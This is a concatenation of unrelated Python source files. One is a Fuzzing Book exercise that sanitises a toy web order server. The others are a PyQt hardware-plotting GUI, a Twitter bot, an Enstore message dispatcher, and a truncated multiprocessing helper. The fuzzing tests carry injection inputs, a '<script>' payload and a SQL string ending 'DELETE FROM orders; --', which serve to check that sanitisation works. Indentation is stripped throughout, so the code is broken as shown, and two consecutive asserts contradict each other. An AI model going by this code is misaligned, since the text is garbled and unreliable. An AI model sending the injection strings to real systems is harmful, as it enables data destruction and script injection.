if __name__ == '__main__':
print('\n## Next Steps')
## Background
## ----------
if __name__ == '__main__':
print('\n## Background')
## Exercises
## ---------
if __name__ == '__main__':
print('\n## Exercises')
### Exercise 1: Fix the Server
if __name__ == '__main__':
print('\n### Exercise 1: Fix the Server')
#### Part 1: Silent Failures
if __name__ == '__main__':
print('\n#### Part 1: Silent Failures')
BETTER_HTML_INTERNAL_SERVER_ERROR = \
HTML_INTERNAL_SERVER_ERROR.replace("<pre>{error_message}</pre>", "")
if __name__ == '__main__':
HTML(BETTER_HTML_INTERNAL_SERVER_ERROR)
class BetterHTTPRequestHandler(SimpleHTTPRequestHandler):
def internal_server_error(self):
# Note: No INTERNAL_SERVER_ERROR status
self.send_response(HTTPStatus.OK, "Internal Error")
self.send_header("Content-type", "text/html")
self.end_headers()
exc = traceback.format_exc()
self.log_message("%s", exc.strip())
# No traceback or other information
message = BETTER_HTML_INTERNAL_SERVER_ERROR
self.wfile.write(message.encode("utf8"))
#### Part 2: Sanitized HTML
if __name__ == '__main__':
print('\n#### Part 2: Sanitized HTML')
import html
class BetterHTTPRequestHandler(BetterHTTPRequestHandler):
def send_order_received(self, values):
sanitized_values = {}
for field in values:
sanitized_values[field] = html.escape(values[field])
sanitized_values["item_name"] = html.escape(
FUZZINGBOOK_SWAG[values["item"]])
confirmation = HTML_ORDER_RECEIVED.format(
**sanitized_values).encode("utf8")
self.send_response(HTTPStatus.OK, "Order received")
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(confirmation)
#### Part 3: Sanitized SQL
if __name__ == '__main__':
print('\n#### Part 3: Sanitized SQL')
class BetterHTTPRequestHandler(BetterHTTPRequestHandler):
def store_order(self, values):
db = sqlite3.connect(ORDERS_DB)
db.execute("INSERT INTO orders VALUES (?, ?, ?, ?, ?)",
(values['item'], values['name'], values['email'], values['city'], values['zip']))
db.commit()
#### Part 4: A Robust Server
if __name__ == '__main__':
print('\n#### Part 4: A Robust Server')
class BetterHTTPRequestHandler(BetterHTTPRequestHandler):
REQUIRED_FIELDS = ['item', 'name', 'email', 'city', 'zip']
def handle_order(self):
values = self.get_field_values()
for required_field in self.REQUIRED_FIELDS:
if required_field not in values:
self.send_order_form()
return
self.store_order(values)
self.send_order_received(values)
#### Part 5: Test it!
if __name__ == '__main__':
print('\n#### Part 5: Test it!')
if __name__ == '__main__':
httpd_process, httpd_url = start_httpd(BetterHTTPRequestHandler)
if __name__ == '__main__':
print_url(httpd_url)
if __name__ == '__main__':
print_httpd_messages()
if __name__ == '__main__':
standard_order = "/order?item=tshirt&name=Jane+Doe&email=doe%40example.com&city=Seattle&zip=98104"
contents = webbrowser(httpd_url + standard_order)
HTML(contents)
if __name__ == '__main__':
assert contents.find("Thank you") > 0
if __name__ == '__main__':
bad_order = "/order?item="
contents = webbrowser(httpd_url + bad_order)
HTML(contents)
if __name__ == '__main__':
assert contents.find("Order Form") > 0
if __name__ == '__main__':
injection_order = "/order?item=tshirt&name=Jane+Doe" + cgi_encode("<script></script>") + \
"&email=doe%40example.com&city=Seattle&zip=98104"
contents = webbrowser(httpd_url + injection_order)
HTML(contents)
if __name__ == '__main__':
assert contents.find("Thank you") > 0
assert contents.find("<script>") < 0
assert contents.find("<script>") > 0
if __name__ == '__main__':
sql_order = "/order?item=tshirt&name=" + \
cgi_encode("Robert', 'x', 'x', 'x'); DELETE FROM orders; --") + \
"&email=doe%40example.com&city=Seattle&zip=98104"
contents = webbrowser(httpd_url + sql_order)
HTML(contents)
if __name__ == '__main__':
assert contents.find("DELETE FROM") > 0
assert not orders_db_is_empty()
if __name__ == '__main__':
httpd_process.terminate()
if __name__ == '__main__':
if os.path.exists(ORDERS_DB):
os.remove(ORDERS_DB)
### Exercise 2: Protect the Server
if __name__ == '__main__':
print('\n### Exercise 2: Protect the Server')
#### Part 1: A Blacklisting Filter
if __name__ == '__main__':
print('\n#### Part 1: A Blacklisting Filter')
#### Part 2: A Whitelisting Filter
if __name__ == '__main__':
print('\n#### Part 2: A Whitelisting Filter')
### Exercise 3: Input Patterns
if __name__ == '__main__':
print('\n### Exercise 3: Input Patterns')
### Exercise 4: Coverage-Driven Web Fuzzing
if __name__ == '__main__':
print('\n### Exercise 4: Coverage-Driven Web Fuzzing')
|
qgui1.py | #!/usr/bin/python
#from PyQt4.QtCore import *
#from PyQt4.QtGui import *
#from PyQt4.Qwt5 import *
import socket
import struct
import logging
import sys,getopt
import os
import random
import numpy
from matplotlib import pyplot as plt
import threading
import sys, time
from PyQt4 import QtCore, QtGui, Qwt5,Qt
import paramhg
sys.path.append('../runtime')
import eth_test
class qgui(QtGui.QWidget):
def __init__(self,regs=None):
QtGui.QWidget.__init__(self)
self.setGeometry(300, 300, 1000, 600)
self.setWindowTitle('qgui')
self.fig1=Qwt5.QwtPlot()
self.fig1.setParent(self)
self.fig1.setGeometry(300,0,400,300)
self.fig2=Qwt5.QwtPlot()
self.fig2.setParent(self)
self.fig2.setGeometry(300,300,400,300)
self.curves1=[]
self.curves2=[]
pens=[QtCore.Qt.red,
QtCore.Qt.black,
QtCore.Qt.cyan,
QtCore.Qt.darkCyan,
QtCore.Qt.darkRed,
QtCore.Qt.magenta,
QtCore.Qt.darkMagenta,
QtCore.Qt.green,
QtCore.Qt.darkGreen,
QtCore.Qt.yellow,
QtCore.Qt.darkYellow,
QtCore.Qt.blue,
QtCore.Qt.darkBlue,
QtCore.Qt.gray,
QtCore.Qt.darkGray,
QtCore.Qt.lightGray]
for index in range(16): #up to 16 curves here
self.curves1.append(Qwt5.QwtPlotCurve())
self.curves1[index].attach(self.fig1)
self.curves1[index].setPen(QtGui.QPen(pens[index]))
self.curves2.append(Qwt5.QwtPlotCurve())
self.curves2[index].attach(self.fig2)
self.curves2[index].setPen(QtGui.QPen(pens[index]))
self.layout = QtGui.QVBoxLayout(self)
self.layout.setContentsMargins(0,0,0,0)
self.layout.setSpacing(0)
self.slider={}
self.param={}
index=0
for reg in regs:
self.slider[index]=param_slider(self,name=reg.name,process=self.test1,y0=index*30,init=reg.value,s_min=reg.min_value,s_max=reg.max_value)
self.param[reg.name]=reg.value
#self.slider[index].connect(self.test1)
#print self.slider[index],index
#self.layout.addWidget(self.slider[index])
index=index+1
print self.param
self.socket = eth_test.setup_sock()
write=write_thread(self.param,self.socket)#self.sender().addr,self.sender().value)
write.start()
self.read=read_and_plot_thread(self.socket)
self.read.signal_got_new_data.connect(self.replot)
self.read.start()
def replot(self,value):
index=0
value=value.transpose()
cav=value[0,:]+1j*value[1,:]
fwd=value[2,:]+1j*value[3,:]
ref=value[4,:]+1j*value[5,:]
self.curves1[0].setData(range(value.shape[-1]),numpy.abs(cav))
self.curves1[1].setData(range(value.shape[-1]),numpy.abs(fwd))
self.curves1[2].setData(range(value.shape[-1]),numpy.abs(ref))
self.curves2[0].setData(range(value.shape[-1]),numpy.angle(cav))
self.curves2[1].setData(range(value.shape[-1]),numpy.angle(fwd))
self.curves2[2].setData(range(value.shape[-1]),numpy.angle(ref))
#print value,len(value.shape)
#if len(value.shape)==1:
# self.curves1[index].setData(range(value.shape[-1]+1),value)
#else:
# for line in value:
# #print index,line,value.shape[1]
# self.curves1[index].setData(range(value.shape[-1]),line)
# index=index+1
self.fig1.replot()
self.fig2.replot()
def __del__(self):
self.socket.close()
print 'quitting qgui'
try:
QtGui.QWidget.__del__(self)
except:
pass
#self.wait()
return
def closeEvent(self,event):
self.read.stop()
event.accept()
def test1(self):
#print self.__class__.__name__
#print obj.__class__.__name__
self.param[self.sender().name]=self.sender().value
write=write_thread(self.param,self.socket)#self.sender().addr,self.sender().value)
write.start()
return
import posix_ipc,mmap
class write_thread(QtCore.QThread):
#write_mq=posix_ipc.MessageQueue("/Write_Down",posix_ipc.O_CREAT,100)
oldumask=os.umask(0)
write_mq=posix_ipc.MessageQueue(name="/Write_Down",flags=posix_ipc.O_CREAT,mode=0666,max_messages=10,max_message_size=1500)
os.umask(oldumask)
def __init__(self,param,socket):#,addr,value):
QtCore.QThread.__init__(self)
print param
self.socket=socket
[self.regs,err_cnt]=paramhg.gen_reg_list(**param)
print 'regs size',len(self.regs)
self.addr=[reg.addr for reg in self.regs]
self.value=[reg.value for reg in self.regs]
#self.strs=[reg.print_regs() for reg in self.regs]
self.p=eth_test.mem_gate_write_prep(self.addr,self.value)
#print '\n'.join(strs)
#self.addr=addr
#self.value=value
def __del__(self):
print 'quitting write thread'
try:
QtCore.QThread.__del__(self)
self.write_mq.close()
self.write_mq.unlink()
except:
pass
self.wait()
#return
def run(self):
#print 'write to hardware',self.strs
try:
print 'message size',len(self.p),self.write_mq.max_message_size
self.write_mq.send(self.p,1,2)
except Exception as inst:
print type(inst)
print inst.args
print inst
#eth_test.mem_gate_write(self.socket,addr,value)
return
#self.terminate()
class read_and_plot_thread(QtCore.QThread):
signal_got_new_data=QtCore.pyqtSignal(numpy.ndarray)
oldumask=os.umask(0)
exit_mq=posix_ipc.MessageQueue(name="/Exit_Up",flags=posix_ipc.O_CREAT,mode=0666,max_messages=10,max_message_size=1500)
os.umask(oldumask)
def __init__(self,socket):
QtCore.QThread.__init__(self)
self.cont=True
#rom=eth_test.mem_gate_read(s,range(0,32))
#eth_test.decode_lbnl_rom(rom)
#self.fig=plt.figure(1)
#self.fig.show()
self.socket=socket
self.addr=[]
self.value=[]
self.rewrite_lock=False
self.data_array=[]
self.index=0
try:
self.memUp=posix_ipc.SharedMemory('Up')
except:
#self.memUp_thread=threading.Thread(target=read_from_hardware)
#self.memUp_thread.start()
os.system('python data.py &')
time.sleep(2)
self.memUp=posix_ipc.SharedMemory('Up')
self.mfUp=mmap.mmap(self.memUp.fd,self.memUp.size)
#def rewrite(self,addr,value):
# self.addr=addr
# self.value=value
# self.rewrite_lock=True
# return
def __del__(self):
#print self.memUp_thread.isAlive()
self.exit_mq.send('Exit_Up')
print 'quitting read thread, message sent'
try:
self.exit_mq.close()
self.exit_mq.unlink()
self.memUp.unlink()
QtCore.QThread.__del__(self)
except:
pass
return
#self.wait()
def stop(self):
print 'quit read'
self.cont=False
def get_new_data(self):
#res=eth_test.read_mem_buf(self.socket)
self.mfUp.seek(0)
res_str=self.mfUp.read(self.memUp.size)
res=struct.unpack('!%dI'%((len(res_str))/4),res_str)
self.index=self.index+1
self.data_array=numpy.array([x-65536 if x>32767 else x for x in res]).reshape([-1,8])
#self.data_array=numpy.array(res).reshape([-1,8])
#numpy.array([range(self.index,self.index+8),range(3,11)])
def run(self):
while (self.cont):
self.get_new_data()
self.signal_got_new_data.emit(self.data_array)
time.sleep(0.1) # artificial time delay
self.terminate()
#print res[1,:]
#print self.rewrite_lock
#print eth_test.mem_gate_write(self.socket,self.addr,self.value)
#eth_test.mem_gate_write(s,addr,value);
# if self.rewrite_lock:
# self.rewrite_lock=False
# else:
# numpy.savetxt("live%d.dat"%fcnt,res,'%6.0f')
# fcnt += 1
# plt.plot(res)
# self.fig.canvas.draw()
# time.sleep(0.1)
# self.fig.clf()
# print 'read and plot thread'
#return
class QELabel(QtGui.QLabel):
def __init__(self,parent):
QtGui.QLabel.__init__(self,parent)
def mouseReleaseEvent(self,ev):
self.emit(QtCore.SIGNAL('clicked()'))
class label_slider_value(QtGui.QWidget):
def __init__(self,diag,name,process=None,init=0,s_min=0,s_max=100,x0=0,y0=0,dx=100,dy=30,mode=0):
QtGui.QWidget.__init__(self);
self.label=QELabel(diag)
self.label.setText(name)
self.sld = QtGui.QSlider(QtCore.Qt.Horizontal, diag)
self.sld.setFocusPolicy(QtCore.Qt.NoFocus)
self.sld.setMinimum(s_min)
self.sld.setMaximum(s_max)
self.value=(0 if init==None else init);
self.sld.setValue(self.value)
self.edit=QtGui.QLineEdit(diag)
self.update_value()
self.sld.valueChanged.connect(self.sld_changed)
self.edit.textChanged.connect(self.text_changed)
if process:
self.connect(self,QtCore.SIGNAL('value_changed'),process)
if (mode==0):
xlabel=x0;ylabel=y0;dxlabel=dx;dylabel=dy;
xslider=x0+dx;yslider=y0;dxslider=dx;dyslider=dy;
xvalue=x0+dx+dx;yvalue=y0;dxvalue=dx;dyvalue=dy;
self.label.setGeometry(xlabel,ylabel,dxlabel,dylabel)
self.sld.setGeometry(xslider,yslider,dxslider,dyslider)
self.edit.setGeometry(xvalue,yvalue,dxvalue,dyvalue)
self.xymax=[min(xlabel,xslider,xvalue),max(ylabel,yslider,yvalue)+dy]
self.sld.sliderPressed.connect(self.press)
self.label.connect(self.label,QtCore.SIGNAL('clicked()'),self.buttonClicked)
def send_sig(self):
self.emit(QtCore.SIGNAL('value_changed'))
def text_changed(self):
self.value=float(self.edit.text())
self.update_value()
def sld_changed(self):
self.value=float(self.sld.value())
self.update_value()
def update_value(self):
self.edit.setText(str(self.value))
self.sld.setValue(self.value)
self.send_sig()
def get_xymax(self):
return self.xymax
def setValue(self,value):
self.sld.setValue(value)
def press(self):
self.sld.setFocus()
def buttonClicked(self):
self.sld.setFocus()
class param_slider(label_slider_value):
def __init__(self,diag,name,process=None,init=0,s_min=0,s_max=100,x0=0,y0=0,dx=100,dy=30,mode=0):
label_slider_value.__init__(self,diag,name,process,init,s_min,s_max,x0,y0,dx,dy,mode)
self.name=name;
self.value=init
class params():
def __init__(self,name,nominal,min_value,max_value):
self.value=nominal
self.min_value=min_value
self.max_value=max_value
self.name=name
if __name__=='__main__':
par=[params('mode1_foffset',0,-1e4,1e4),
params('mode1_Q1',8.1e4,4.4e4,8.9e4),
params('mmode1_freq',30e3,10e3,40e3),
params('mmode1_Q',5.0,2,10),
#params('net1_coupling',100,0,200),
#params('net2_coupling',200,0,200),
#params('net3_coupling',150,0,200),
params('fwd_phase_shift',0,-180,180),
params('rfl_phase_shift',0,-180,180),
params('cav_phase_shift',0,-180,180),
params('PRNG_en',1,0,1),
params('sel_en',1,0,1),
params('ph_offset',-13000,-131072,131071), # -13300 ?
params('amp_max',10000,10,32767),
params('set_X',20000,0,32767),
params('set_P',0,-131072,131071),
params('k_PA',-200,-1000,0),
params('k_PP',-200,-1000,0),
params('maxq',0,0,12000),
params('duration',2000,1,8200),
params('piezo_dc',-900,-32768,32767) # -1400 ?
]
#regs={'t1':{'name':'t1','addr':1,'value':3},
#'t2':{'name':'t1','addr':2,'value':3},
#'t3':{'name':'t1','addr':3,'value':3},
#'t4':{'name':'t1','addr':4,'value':3},
#'t5':{'name':'t1','addr':5,'value':3},
#'t6':{'name':'t1','addr':6,'value':3}}
app=QtGui.QApplication(sys.argv)
test=qgui(par)
test.show()
print 'here'
app.exec_()
|
bot.py | ''' Module main class '''
import os
import logging
import datetime
import json
from time import sleep
from threading import Thread
from shutil import copyfile
from tweepy import API, StreamListener
from .file_io import LoadFromFile
from .config import Config
from .flags import BotFunctions, BotEvents
from .logs import log, log_setup
class TweetFeeder(StreamListener):
"""
Dual-threaded bot to post tweets periodically,
to track the tweets' performance, and to send alerts
to / take commands from a master Twitter account.
"""
def __init__(self, functionality=BotFunctions(), config=Config()):
"""
Create a TweetFeeder bot,
acquire authorization from Twitter (or run offline)
"""
log_setup(
True,
config.filenames['log'] if (
BotFunctions.LogToFile in functionality
) else "",
TweetFeeder.LogSender(self.send_dummy_dm) if (
BotFunctions.SendAlerts in functionality
) else None
)
self.functionality = functionality
log(
BotEvents.SYS.Setup,
"{:-^80}".format(str(functionality) if functionality else "Offline testing")
)
self.config = config
self.api = API(config.authorization)
StreamListener.__init__(self.api)
if(
BotFunctions.TweetOffline in functionality or
BotFunctions.TweetOnline in functionality
):
self.running = True
self._start_tweeting()
class LogSender:
"""
Acts as a delegate container so that the logger module
can send log output over Twitter to the master account.
"""
def __init__(self, send_method):
''' Attach the send_method that will be called for write() '''
self.send_method = send_method
def write(self, text):
''' If the text is substantial, forward it '''
if len(text) > 1: #This prevents unnecessary terminators from being sent
self.send_method(text)
def send_dummy_dm(self, text):
''' Temporary implementation for sending logs over Twitter '''
self.api.send_direct_message(user=self.config.master_id, text=text)
def on_connect(self):
"""Called once connected to streaming server.
This will be invoked once a successful response
is received from the server. Allows the listener
to perform some work prior to entering the read loop.
"""
log(BotEvents.SYS.ThreadStart, "Streaming")
def on_direct_message(self, status):
""" Called when a new direct message arrives """
try:
if status.direct_message['sender_id'] != self.config.my_id:
log(
BotEvents.NET.GetDM, "{}: {}".format(
status.direct_message['sender_screen_name'],
status.direct_message['text']
)
)
return True
except BaseException as my_event:
log(BotEvents.DBG.Warn, str(my_event))
def on_event(self, status):
""" Called when a new event arrives.
This responds to "favorite" and "quoted_tweet."
"""
if status.event == "favorite": #This tends to come in delayed bunches
log(
BotEvents.NET.GetFavorite,
"{}: {}".format(
status.source.screen_name,
status.target_object.id
)
)
elif status.event == "quoted_tweet":
log(
BotEvents.NET.GetQuoteRetweet,
"{}: {}".format(
status.source['screen_name'],
status.target_object['text']
)
)
elif status.event == "unfavorite":
pass #feed tracking only requires updating tweet stats based on current totals
else:
log(BotEvents.NET.GetUnknown, "on_event: " + status.event)
def on_status(self, status):
""" Called when a new status arrives. """
if hasattr(status, 'retweeted_status'):
log(
BotEvents.NET.GetRetweet,
"{}: {}".format(
status.user.screen_name,
status.retweeted_status.id
)
)
elif status.is_quote_status:
pass #Ignore; this will be picked up by on_event
elif status.in_reply_to_user_id == self.config.my_id:
log(
BotEvents.NET.GetReply,
"{}: {}".format(
status.author.screen_name,
status.text
)
)
elif status.author.id == self.config.my_id and not status.in_reply_to_user_id:
log(BotEvents.NET.SendTweet, status.id)
#TODO: Register tweet in feed_tracking.json
else:
log(
BotEvents.NET.GetUnknown,
"on_status: " + str(status)
)
def on_disconnect(self, notice):
""" Called when Twitter submits an error """
log(BotEvents.SYS.ThreadStop, "Streaming: " + notice)
self.running = False
def get_next_tweet_datetime(self):
""" Gets the next datetime at which tweeting will occur. """
# Supply immediate times if no tweet times and tweeting offline
if not self.config.tweet_times and BotFunctions.TweetOffline in self.functionality:
return (
datetime.datetime.now() +
datetime.timedelta(seconds=self.config.min_tweet_delay*0.2)
)
# Offline or not, if there are tweet times, use them
if self.config.tweet_times:
final_time = self.config.tweet_times[-1]
now_t = datetime.datetime.now()
next_t = now_t.replace(
hour=final_time[0],
minute=final_time[1],
second=0,
microsecond=0)
if now_t > next_t: #The final time lies before the current
next_t = next_t + datetime.timedelta(days=1)
for time in self.config.tweet_times:
# Pick apart time tuple, put in next_t
next_t = next_t.replace(hour=time[0], minute=time[1])
if now_t < next_t: # If next_t is in the future
return next_t.replace(second=0)
#Failure
return None
def update_feed_index(self, index):
""" Wrapper for _save_tweet_data; updates feed index """
self._save_tweet_data(index=index)
def update_tweet_stats(self, tweet):
""" Wrapper for _save_tweet_data; updates tweet stats """
self._save_tweet_data(tweet=tweet)
def _save_tweet_data(self, index=0, tweet=None):
""" Saves the current feed index and altered tweet stats. """
all_tweet_data = dict()
#Prepare all_tweet_data; attempt to load existing data
if os.path.exists(self.config.filenames['stats']): #Load existing data
with open(self.config.filenames['stats'], 'r', encoding="utf8") as infile:
all_tweet_data = json.load(infile)
copyfile(self.config.filenames['stats'], self.config.filenames['stats'] + ".bak")
else:
all_tweet_data = {"feed_index": 0}
#Edit all_tweet_data
if BotFunctions.SaveTweetIndex in self.functionality and index > 0:
all_tweet_data['feed_index'] = index
if BotFunctions.SaveTweetStats in self.functionality and tweet:
if tweet.author.id == self.config.my_id: #Bot tweeted this
all_tweet_data['tweet_stats'][tweet.id]['title'] = tweet.title
#Save all_tweet_data to config.filenames['stats']
with open(self.config.filenames['stats'], 'w', encoding="utf8") as outfile:
json.dump(all_tweet_data, outfile)
def _start_tweeting(self):
""" Begin normal functionality loop. """
log(BotEvents.SYS.ThreadStart, "Tweet loop")
self._tweet_thread = Thread(target=self._tweet_loop)
self._tweet_thread.start()
def _tweet_loop(self):
""" Loop for tweeting, while the stream is open. """
next_index = LoadFromFile.load_last_feed_index(self.config.filenames['stats'])
while self.running:
# Get next tweet(s) ready
next_tweets, feed_length = (
LoadFromFile.tweets_at(next_index, self.config.filenames['feed'])
)
next_index += 1
if not next_tweets:
log(BotEvents.SYS.ThreadStop, "Tweet loop: tweets_at() failed")
self.running = False
break
# Sleep until time in config
next_time = self.get_next_tweet_datetime()
if next_time:
delta = next_time - datetime.datetime.now()
else:
log(BotEvents.SYS.ThreadStop, "Tweet loop: get_next_tweet_datetime() failed")
self.running = False
break
print("Wait for {} seconds".format(delta.total_seconds()))
sleep(delta.total_seconds()) # > WAIT FOR NEXT TWEET TIME <<<<<<<<<<<<<<<<<<<<<<<<<<
log_str = "{} tweet{} starting at {} ({})".format(
len(next_tweets),
's' if (len(next_tweets) > 1) else '',
next_index,
next_tweets[-1]['title']
)
log(BotEvents.SYS.LoadTweet, log_str)
print(log_str)
# Submit each tweet in chain (or just one, if not a chain)
if BotFunctions.TweetOnline in self.functionality:
for tweet in next_tweets:
self.api.update_status(
'{}\n{} of {}'.format(tweet['text'], next_index, feed_length)
)
next_index += 1
sleep(self.config.min_tweet_delay.TWEET_DELAY)
self.update_feed_index(next_index)
# Running loop ended
log(BotEvents.SYS.ThreadStop, "Tweet loop ended.")
|
lmd.py | #!/usr/bin/env python
##############################################################################
#
# $Id$
##############################################################################
'''
LMD - python prototype for Enstore File Cache Library Manager Dispatcher core functionality implementation
'''
# system imports
import sys
import time
import types
from multiprocessing import Process
# qpid / amqp
import qpid.messaging
import Queue
# enstore imports
import e_errors
import enstore_constants
# enstore cache imports
#from cache.messaging.client import EnQpidClient
import cache.messaging.client as cmc
debug = True
class LMD():
'''
classdocs
'''
def __init__(self, amq_broker=("localhost",5672), myaddr="lmd", target="lmd_out", auto_ack=True ):
'''
Constructor
'''
self.shutdown = False
self.finished = False
self.myaddr = myaddr
self.target = target
if debug: print "DEBUG lmd _init myaddr %s target %s"%(self.myaddr, self.target)
self.qpid_client = cmc.EnQpidClient(amq_broker, self.myaddr, self.target)
self.auto_ack = auto_ack
def _fetch_enstore_ticket(self):
try:
return self.qpid_client.rcv.fetch()
except Queue.Empty:
return None
except qpid.messaging.ReceiverError, e:
print "LMD: lmd _fetch_enstore_ticket() error: %s" % e
return None
def _ack_enstore_ticket(self, msg):
try:
if debug: print "DEBUG lmd _ack_enstore_ticket(): sending acknowledge"
self.qpid_client.ssn.acknowledge(msg)
except:
exc, emsg = sys.exc_info()[:2]
if debug: print "DEBUG lmd _ack_enstore_ticket(): Can not send auto acknowledge for the message. Exception e=%s msg=%s" % (str(exc), str(emsg))
pass
##############################################################################
# Ticket Processing logic
#
libs = [ "9940",
"CD-9940B",
"CD-LTO3",
"CD-LTO3_test",
"CD-LTO3_test1",
"CD-LTO4F1",
"CD-LTO4F1T",
"CD-LTO4G1E",
"CD-LTO4G1T",
"TST-9940B",
"null1" ]
def lmd_decision(self, ticket):
KB=enstore_constants.KB
MB=enstore_constants.MB
GB=enstore_constants.GB
result = ticket
if type(ticket) != types.DictType:
if debug: print "DEBUG lmd serve_qpid() - ticket is not dictionary type, ticket %s." % (ticket)
result['status'] = (e_errors.LMD_WRONG_TICKET_FORMAT, 'LMD: ticket is not dictionary type')
return result
try:
# file_size_vc = ticket['file_size'] # which one?
d = 'fc.size'
file_size = ticket['wrapper'].get('size_bytes',0L)
d = 'work'
work = ticket['work']
d = 'vc'
vc = ticket['vc']
d = 'vc.library'
library = vc['library']
d = 'vc.file_family'
file_family = vc['file_family']
d = 'vc.storage_group'
storage_group = vc['storage_group']
except:
if debug:
print "DEBUG lmd serve_qpid() - encp ticket bad format, ticket %s." % (ticket)
print "DEBUG lmd serve_qpid() d %s %s"%(type(d), d)
result['status'] = (e_errors.LMD_WRONG_TICKET_FORMAT,"LMD: can't get required fields, %s" % d)
return result
#
# Policy example.
# For short files redirect library to cache Library Manager
#
try:
newlib = None
if work == 'write_to_hsm' :
if file_size < 300*MB :
if library == 'CD-LTO4F1T' :
newlib = 'diskSF'
elif library == 'LTO3' :
newlib = 'diskSF'
elif library == 'LTO5' :
newlib = 'diskSF'
elif storage_group == 'minos' :
newlib = 'diskSF'
if work == 'read_from_hsm' :
if library == 'LTO3' :
newlib = 'diskSF'
if newlib != None :
# store original VC library in reply
result['original_library'] = result['vc']['library']
result['vc']['library'] = newlib
result['vc']['wrapper'] = "null" # if file gets writtent to disk, its wrapper must be null
except:
exc, msg, tb = sys.exc_info()
if debug: print "DEBUG lmd serve_qpid() - exception %s %s" % (exc, msg)
if debug: print "DEBUG lmd serve_qpid() - newlib %s" % (newlib)
if debug: print "DEBUG lmd serve_qpid() - result['vc']['library'] %s" % (result['vc']['library'])
result['status'] = (e_errors.LMD_WRONG_TICKET_FORMAT,"LMD: can't set library")
result['status'] = (e_errors.OK, None)
return result
##############################################################################
def serve_qpid(self):
"""
read qpid messages from queue
"""
self.qpid_client.start()
try:
while not self.shutdown:
# Fetch message from qpid queue
message = self._fetch_enstore_ticket()
if not message:
continue
if debug: print "DEBUG lmd serve_qpid() - got encp message=%s" %(message,)
ticket = message.content
##################
# Process ticket #
##################
reply = None
try:
if debug: print "DEBUG lmd serve_qpid() - received message, ticket %s." % (ticket)
result = self.lmd_decision(ticket)
if debug: print "DEBUG lmd serve_udp() : result =%s" % (result)
reply = qpid.messaging.Message(result, correlation_id=message.correlation_id )
except:
# @todo - report error
print "lmd: ERROR - can not process message, original message = %s" % (message)
if debug: print "DEBUG lmd serve_udp() : reply =%s" % (reply)
# send reply to encp
try:
if reply :
self.qpid_client.send(reply)
if debug: print "DEBUG lmd serve_udp() : reply sent, msg=%s" % (reply)
except qpid.messaging.SendError, e:
if debug: print "DEBUG lmd serve_udp() : sending reply, error=", e
continue
# Acknowledge ORIGINAL ticket so we will not get it again
self._ack_enstore_ticket(message)
# try / while
finally:
self.qpid_client.stop()
def start(self):
# start server in separate process (we may add more processes reading the same queue)
self.qpid_proc = Process(target=self.serve_qpid)
self.qpid_proc.start()
def stop(self):
# tell serving thread to stop and wait until it finish
self.shutdown = True
self.qpid_client.stop()
self.qpid_proc.join()
if __name__ == "__main__":
# test unit
# instantiate LMD server
queue_in = "udp_relay_test"
#queue_out = "udp2amq_131.225.13.37_7700" # set it once for all messages
queue_out = "udp2amq_131.225.13.37_7710" # set it once for all messages
lmd = LMD(myaddr=queue_in, target=queue_out)
lmd.start()
# stop lmd server if there was keyboard interrupt
while not lmd.finished :
try:
time.sleep(1)
except KeyboardInterrupt:
print "Keyboard interrupt at main thread"
lmd.stop()
break
del lmd
print "lmd finished"
|
mrun.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author: Seaky
# @Date: 2019/4/20 14:44
import queue
import time
import traceback
from collections import OrderedDict
from multiprocessing import Process, Manager
from random import randint
from ..data.mysql import MyModel
from ..data.mysql import new_session
from ..func.base import MyClass, catch_exception
from ..func.parser import ArgParseClass
from ..os.info import get_caller
from ..os.oper import dump_data, load_data
class MultiRun(MyClass):
def __init__(self, func, func_kws, process_num=5, func_common_kw=None, func_common_kw_with_obj=None,
process_db_session_enable=False, process_db_session_kw=None, show_process=False, show_job_result=False,
mark_start_time=False, add_log_to_common_kw=True, **kwargs):
'''
:param func: 处理函数,需要返回 status, result
:param func_kws: 需要处理的参数
:param process_num: 进程数,如果要连db,需要注意数据库connection的限制
:param inline: 单进程运行
:param func_common_kw: 函数通用参数, 不能放入log object
:param func_common_kw_with_obj: 函数通用参数, 可放入object,如log,因为object不能被dump,所以单独处理
:param process_db_session_enable: 每个process创建db_session传给job,而不是由job自己创建
:param process_db_session_kw: db_session_kw创建参数 {'conn_str':''}
:param show_process: 显示process调试
:param show_job_result: 显示每个job的result
:param mark_start_time: 给job传入start_time以统计时间
:param add_log_to_common_kw:
:return
'''
MyClass.__init__(self, **kwargs)
self.func = func
assert isinstance(func_kws, list), 'func_kws is not a list.'
self.func_kws = func_kws
self.func_common_kw = {} if func_common_kw is None else func_common_kw
self.func_common_kw_with_obj = {} if func_common_kw_with_obj is None else func_common_kw_with_obj
self.control['process_num'] = process_num if isinstance(process_num, int) else process_num
self.control['process_db_session_enable'] = process_db_session_enable
self.control['process_db_session_kw'] = process_db_session_kw
self.control['show_process'] = show_process
self.control['show_job_result'] = show_job_result
self.control['mark_start_time'] = mark_start_time
self.stat = {'miss': 0, 'success': 0, 'fail': 0, 'total': len(self.func_kws), 'timer': {}}
if add_log_to_common_kw and 'log' not in self.func_common_kw_with_obj:
self.func_common_kw_with_obj['log'] = self.log
self.cache['timer_retry'] = []
def before_run(self):
self.func_kws_now = self.func_kws
def job(self, process_i, inline=False):
self.show_process_debug('process {} start.'.format(process_i))
if self.default('process_db_session_enable') and self.default('process_db_session_kw'):
db_session = new_session(**self.default('process_db_session_kw'))
self.show_process_debug('process {} create data session {}.'.format(process_i, db_session))
else:
db_session = None
i = 0
while True:
try:
start_time = time.time()
if not inline:
v = self.q_input.get_nowait()
else:
v = self.q_input[i]
i += 1
self.show_process_debug('process {} get {} job, kwarg: {}'.format(process_i, v['order_in'], v['kw']))
if db_session:
self.func_common_kw_with_obj.update({'db_session': db_session})
st = {'start_time': start_time} if self.default('mark_start_time') else {}
self.timer[v['idx']] = start_time
try:
is_ok, result = self.func(**v['kw'], **self.func_common_kw_with_obj, **st)
except Exception as e:
self.log.info(traceback.format_exc())
is_ok, result = False, str(e)
elapsed_time = round(time.time() - start_time, 2)
v.update({'is_ok': is_ok, 'result': result, 'timer': elapsed_time})
if self.default('show_job_result'):
_log = self.log.info if is_ok else self.log.error
_log('{} | time: {}'.format(result, elapsed_time))
self.show_process_debug('process {} do {} job done. result: {}'.format(process_i, v['order_in'],
{'is_ok': is_ok,
'result': result}))
if not inline:
self.q_output.put(v)
else:
self.q_output.append(v)
except queue.Empty:
break
except IndexError:
break
except Exception as e:
self.log.info(traceback.format_exc())
break
if db_session:
db_session.close()
self.show_process_debug('process {} end.'.format(process_i))
@catch_exception()
